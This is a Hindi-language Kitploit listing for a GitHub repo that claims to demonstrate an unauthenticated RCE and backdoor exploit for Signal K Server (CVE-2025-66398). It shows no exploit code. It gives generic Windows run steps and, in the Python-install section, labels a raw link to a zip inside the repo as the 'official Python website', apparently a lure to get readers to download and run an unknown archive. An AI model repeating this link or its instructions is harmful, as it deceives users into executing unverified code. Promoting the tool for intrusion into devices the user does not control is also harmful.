Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-66398 — Demonstrate exploitation of Signal K Server CVE-2025-66398 allowing unauthenticated attackers to inject backdoor and enable remote code execution. | Kitploit
उपकरण/GitHubGitHub/showy-headteacher114/cve-2025-66398
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Demonstrate exploitation of Signal K Server CVE-2025-66398 allowing unauthenticated attackers to inject backdoor and enable remote code execution.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
13घं 36मि पहलेअभी तक समीक्षित नहीं

⚠️ cve-2025-66398 - सरल RCE प्रूफ ऑफ कॉन्सेप्ट टूल

Download


⚙️ इस टूल के बारे में

यह प्रोजेक्ट Signal K Server संस्करण 2.18.0 और उससे पुराने संस्करणों में एक रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता को प्रदर्शित करता है। प्रूफ ऑफ कॉन्सेप्ट (PoC) दिखाता है कि कैसे एक हमलावर कमजोर डिवाइस पर कमांड चला सकता है।

यह टूल सुरक्षा परीक्षकों, सिस्टम एडमिन, या उन सभी के लिए डिज़ाइन किया गया है जो इस सुरक्षा मुद्दे को समझने में रुचि रखते हैं। इसे चलाने के लिए किसी प्रोग्रामिंग कौशल की आवश्यकता नहीं है, लेकिन बुनियादी कंप्यूटर नेविगेशन ज्ञान सहायक होता है।


🖥️ सिस्टम आवश्यकताएँ

  • विंडोज 10 या बाद का
  • कम से कम 2 GB खाली RAM
  • 100 MB खाली डिस्क स्थान
  • फ़ाइलें डाउनलोड करने के लिए इंटरनेट कनेक्शन
  • प्रशासक अधिकारों की आवश्यकता नहीं है

📥 कैसे डाउनलोड और इंस्टॉल करें

नीचे दिए गए बटन पर क्लिक करें प्रोजेक्ट पेज पर जाएँ और फ़ाइलें डाउनलोड करें।

Download

चरण 1: डाउनलोड पेज पर जाएँ

उपरोक्त लिंक पर जाएँ। आप GitHub पेज पर फ़ाइलों और फ़ोल्डरों की एक सूची देखेंगे।

चरण 2: ZIP फ़ाइल डाउनलोड करें

पेज के ऊपरी दाएं कोने के पास हरे Code बटन को देखें। उस पर क्लिक करें और Download ZIP चुनें।

चरण 3: फ़ाइलें निकालें

  • डाउनलोड की गई ZIP फ़ाइल को अपने Downloads फ़ोल्डर में खोजें।
  • ZIP फ़ाइल पर राइट-क्लिक करें और Extract All चुनें।
  • वह फ़ोल्डर चुनें जहाँ आप फ़ाइलें रखना चाहते हैं, फिर Extract पर क्लिक करें।

चरण 4: एप्लिकेशन ढूँढें

निकाले गए फ़ोल्डर को खोलें। आपको प्रोजेक्ट से संबंधित फ़ाइलें, जैसे स्क्रिप्ट और दस्तावेज़, दिखनी चाहिए।


▶️ विंडोज़ पर टूल कैसे चलाएँ

प्रोजेक्ट Python और Go में लिखी गई स्क्रिप्ट का उपयोग करता है। टूल चलाने के लिए, आप एक सरल कमांड प्रॉम्प्ट विंडो का उपयोग करेंगे।

चरण 1: कमांड प्रॉम्प्ट खोलें

  • अपने कीबोर्ड पर Win + R दबाएँ।
  • cmd टाइप करें और Enter दबाएँ।

चरण 2: फ़ोल्डर पर जाएँ

यह कमांड टाइप करें, path\to\folder को अपने निकाले गए फ़ोल्डर पथ से बदलें:

root@kitploit:~
cd path\to\folder

Enter दबाएँ।

चरण 3: स्क्रिप्ट चलाएँ

आपको run.bat या start.bat जैसे नाम की एक स्क्रिप्ट मिल सकती है। यदि हाँ, तो उसका नाम टाइप करें और Enter दबाएँ। उदाहरण के लिए:

root@kitploit:~
run.bat

यदि कोई BAT फ़ाइल नहीं है, तो .py पर समाप्त होने वाली Python स्क्रिप्ट देखें। आपके पास अपने PC पर Python स्थापित होना चाहिए (अगला अनुभाग देखें)।

इसे चलाने के लिए यह कमांड टाइप करें:

root@kitploit:~
python scriptname.py

scriptname.py को वास्तविक फ़ाइल नाम से बदलें।


🐍 पायथन स्थापित करना (यदि आवश्यक हो)

यदि आपको कोई त्रुटि मिलती है कि Python पहचाना नहीं गया, तो आपको Python स्थापित करने की आवश्यकता है।

चरण 1: पायथन डाउनलोड करें

आधिकारिक Python वेबसाइट पर जाएँ:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

नवीनतम Windows इंस्टॉलर पर क्लिक करें और इसे डाउनलोड करें।

चरण 2: पायथन स्थापित करें

  • डाउनलोड किए गए इंस्टॉलर को चलाएँ।
  • Install Now पर क्लिक करने से पहले Add Python to PATH कहने वाले बॉक्स को चेक करें।
  • इंस्टॉल समाप्त होने तक प्रतीक्षा करें।

चरण 3: पायथन स्थापना सत्यापित करें

एक नई कमांड प्रॉम्प्ट विंडो खोलें और टाइप करें:

root@kitploit:~
python --version

इसे स्थापित Python संस्करण दिखाना चाहिए।


🚨 टूल को सुरक्षित रूप से चलाना

यह टूल केवल एक विशिष्ट भेद्यता के परीक्षण और सीखने के लिए है। इसे सुरक्षित वातावरण में उपयोग करें, जैसे परीक्षण नेटवर्क या पृथक मशीन।

इसे उन सिस्टमों पर कभी न चलाएँ जिनके मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।


🔍 टूल कैसे काम करता है

टूल Signal K Server संस्करण 2.18.0 या उससे पुराने संस्करण चलाने वाले उपकरणों को स्कैन करता है। यह ऐसे कमांड भेजने का प्रयास करता है जो भेद्यता का शोषण करते हैं और जाँचता है कि लक्ष्य उन्हें निष्पादित करता है या नहीं।

यह सुरक्षा पेशेवरों को यह पुष्टि करने की अनुमति देता है कि उनके सिस्टम कमजोर हैं या नहीं और उन्हें अपडेट या सुरक्षित करने के लिए कार्रवाई कर सकते हैं।


💡 समस्या निवारण

  • यदि टूल शुरू नहीं होता है, तो जाँचें कि आप कमांड प्रॉम्प्ट में सही फ़ोल्डर में हैं।
  • सुनिश्चित करें कि Python स्थापित है और आपके सिस्टम PATH में जोड़ा गया है।
  • अन्य एप्लिकेशन बंद करें जो नेटवर्क एक्सेस को अवरुद्ध कर सकते हैं।
  • यदि आपको अनुमति संबंधी त्रुटियाँ आती हैं तो कमांड प्रॉम्प्ट को व्यवस्थापक के रूप में चलाएँ।
  • सुनिश्चित करें कि लक्ष्य डिवाइस नेटवर्क पर पहुँच योग्य है।

📄 अतिरिक्त संसाधन

CVE-2025-66398 भेद्यता के बारे में अधिक जानकारी के लिए, सुरक्षा डेटाबेस या GitHub पर संबंधित शोध खोजें।


🔗 डाउनलोड लिंक

टूल फ़ाइलें डाउनलोड करने के लिए इस पेज पर जाएँ:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

टूल डाउनलोड करें